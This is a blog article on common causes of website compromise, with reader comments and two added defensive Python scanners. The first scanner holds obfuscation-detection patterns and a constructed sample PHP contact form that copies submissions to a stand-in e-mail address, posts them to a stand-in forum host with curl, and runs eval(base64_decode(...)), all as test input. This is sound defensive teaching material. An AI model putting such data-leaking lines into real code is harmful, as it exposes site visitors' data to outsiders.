
When Your Website Gets Hacked, Whose Fault Is It?


Many website owners are livid when their websites are defaced or hacked and a message is put up by the hackers. They are panicked and angry: Who could it be? Why me? How did they enter? What did I miss? Whose fault is it?

These are all common questions that come up when an incident occurs. This article discusses the possible reasons your website was compromised and how to deal with them.

Your Designer

Many website designers claim to know a lot about designing and website development, but simply know how to copy designs and layouts and make them fit in with your website.

While trying to put in transitions and effects to your website elements, they most often copy code or boilerplate templates from free websites or previous projects. These code snippets have rarely been tested and no due diligence has been done to ensure their integrity. Many a time even prominent encoded malware is slipped into the code, which very few designers really understand.

Your Coder / Programmer

Just like the design aspect, even many coders and programmers are known to lift code from various sample websites, to match the taste of their client. Little do they realize that they are exposing their work to direct threats which are constantly waiting for easy prey. Code for menus, slideshows, sidebars, contact forms and even chat applications could be laced with malicious code, which may either give control of the website and hosting account to an outsider or cause some automated scripts to run on the website.

A client of ours was very surprised that all enquiries from his contact form were visible on a business forum. When he tested out the form, he realized that the form was auto-posting the results to the forum and suspected that the coder had played mischief. When he contacted the coder, the coder admitted to having used a free contact form script due to some special features. When a security professional inspected the code, he discovered that not only were the contacts being posted to the forum, but they were also being copied to an obscure e-mail address.

Your Template

All of us are drawn into template-based systems, due to their quick setup turnaround time and ease of use. But many people don’t want to pay the template designers for their efforts and would prefer to buy pirated or nulled versions of the same paid templates. There is always a price for cutting corners and in this case, the price can be quite large. Those who distribute nulled versions for free often want some quid pro quo and add their own code or scripts to the templates, so that they also benefit from your using the template. Popup ads, banners, redirects, silent copying of your content and even mass mailing scripts are all part and parcel of using a stolen template.
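A review of the kind described in the designer, coder and template sections above can be partly automated. The following is an added example, not code from this article: it flags encoded or obfuscated constructs and any hard-coded e-mail address or URL outside the domains the site owner expects. The function name, the patterns, the sample form and its domains are all constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Assumed patterns: constructs often used to hide code in copied PHP/JS snippets.
OBFUSCATION_PATTERNS = {
    "eval of decoded data": re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "JavaScript eval of unescape/atob": re.compile(r"eval\s*\(\s*(unescape|atob)\s*\(", re.I),
    "long base64-like literal": re.compile(r"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]"),
}
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@([A-Za-z0-9.-]+\.[A-Za-z]{2,})")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)


def audit_source(text, allowed_domains):
    """Return a list of (line_no, finding) for the text of one source file."""
    allowed = {d.lower() for d in allowed_domains}

    def is_allowed(host):
        host = host.lower()
        return any(host == d or host.endswith("." + d) for d in allowed)

    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        for label, pattern in OBFUSCATION_PATTERNS.items():
            if pattern.search(line):
                findings.append((no, label))
        for m in EMAIL_RE.finditer(line):
            if not is_allowed(m.group(1)):
                findings.append((no, "e-mail to unlisted domain: " + m.group(0)))
        for m in URL_RE.finditer(line):
            host = urlparse(m.group(0)).hostname or ""
            if not is_allowed(host):
                findings.append((no, "URL on unlisted domain: " + host))
    return findings


# Constructed sample: a "free" contact form handler like the one in the story above.
SAMPLE_FORM = """<?php
$to = "sales@example.com";
mail($to, "Enquiry", $_POST["message"]);
mail("collector@mailbox.invalid", "copy", $_POST["message"]);
$ch = curl_init("http://forum.invalid/newpost.php");
curl_setopt($ch, CURLOPT_POSTFIELDS, $_POST);
eval(base64_decode($cfg));
"""

if __name__ == "__main__":
    for line_no, finding in audit_source(SAMPLE_FORM, ["example.com"]):
        print(f"line {line_no}: {finding}")
```

A clean result does not prove a script is safe; the scan only narrows down which lines a reviewer should read first.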

The CMS System

The CMS System that you use also plays an important part in ensuring that your website content remains safe. Numerous vulnerabilities are found every day across various open source and paid CMS systems. Not patching these vulnerabilities and not applying frequent updates to them increases your chances of being attacked by serial attackers who are specifically targeting your type of website system.

Your Hosting Company

It is also possible that the systems of your Hosting Company are infected and the malware or virus is spreading through their network. Although the chances of this are low, this can be easily determined by inspecting the logs of the hosting account. If the damage was done through a super user, then it is necessary to get the entire server and network checked.

Your Own Fault

More often than not, the website owner or webmaster or admin is at fault for doing or not doing something at the right time and right place. Setting permissions too loosely, using plain text passwords in code and even allowing users to upload to a system folder are all ways in which the admin is responsible for getting the website into trouble.
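The three admin mistakes named above can be checked for in one pass over the document root. This is an added example, not code from this article; the function name, the upload folder name "uploads", the script extensions and the password pattern are assumptions to adapt to your own site.

```python
import os
import re
import stat
import sys

SCRIPT_EXTENSIONS = (".php", ".phtml", ".cgi", ".pl", ".py")  # assumed list
# Assumed pattern: a quoted literal assigned to a password-like name,
# e.g. $db_password = "..."; or define('DB_PASSWORD', '...');
PLAINTEXT_SECRET = re.compile(
    r"(pass(word|wd)?|secret|api_?key)\w*['\"\]]*\s*(=>|=|:|,)\s*['\"][^'\"$]{4,}['\"]",
    re.I)


def audit_webroot(root, upload_dirs=("uploads",)):
    """Walk a document root; return a sorted list of (relative_path, issue)."""
    issues = []
    for folder, _dirs, files in os.walk(root):
        rel_folder = os.path.relpath(folder, root)
        in_uploads = rel_folder.split(os.sep)[0] in upload_dirs
        # Loose permissions: anyone on the server can write here.
        if os.stat(folder).st_mode & stat.S_IWOTH:
            issues.append((rel_folder, "world-writable directory"))
        for name in files:
            path = os.path.join(folder, name)
            rel = os.path.relpath(path, root)
            is_script = name.lower().endswith(SCRIPT_EXTENSIONS)
            if os.stat(path).st_mode & stat.S_IWOTH:
                issues.append((rel, "world-writable file"))
            if is_script and in_uploads:
                # User uploads landing where the server will execute them.
                issues.append((rel, "executable script inside upload folder"))
            elif is_script:
                with open(path, errors="replace") as handle:
                    if PLAINTEXT_SECRET.search(handle.read()):
                        issues.append((rel, "plain text password in code"))
    return sorted(issues)


if __name__ == "__main__":
    for rel_path, issue in audit_webroot(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{rel_path}: {issue}")
```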

About the author


Alex HD

  • Nice article. Informative and concise. The only thing missing is an explanation of the actors. Most ‘owners’ don’t know the difference between designer, coder, programmer, webmaster, etc.

  • My website was hacked several times. I was amazed at why someone would hack my site. But your post helped me to understand the purpose. Thank you very much for this post. 😀

  • Just goes to prove – you get what you pay for.

    If you want something free/on the cheap, then don’t expect your website to be bullet proof. Professional web developers/programmers KNOW the language(s) the website is coded in and the technologies behind them – so that, even if they do use templates for speed, they’re able to “lift the lid” and understand all that’s going on under the hood. It’s here where professional qualifications/certifications come into their own – as the person holding them, has been tested in exam-like conditions (no cheat sheets/books/Internet etc. to fall back on).

  • For 20 years now I am a senior information security consultant owner of egroup Services. Well, I would agree with all the information above. However, if a case ends up in court every person within the cycle of a web project mentioned would cover up. Please understand, it is best to outsource Info. Sec. of your web site. Ever since I did for all my customers I sleep better…
    CEO – Egroup Services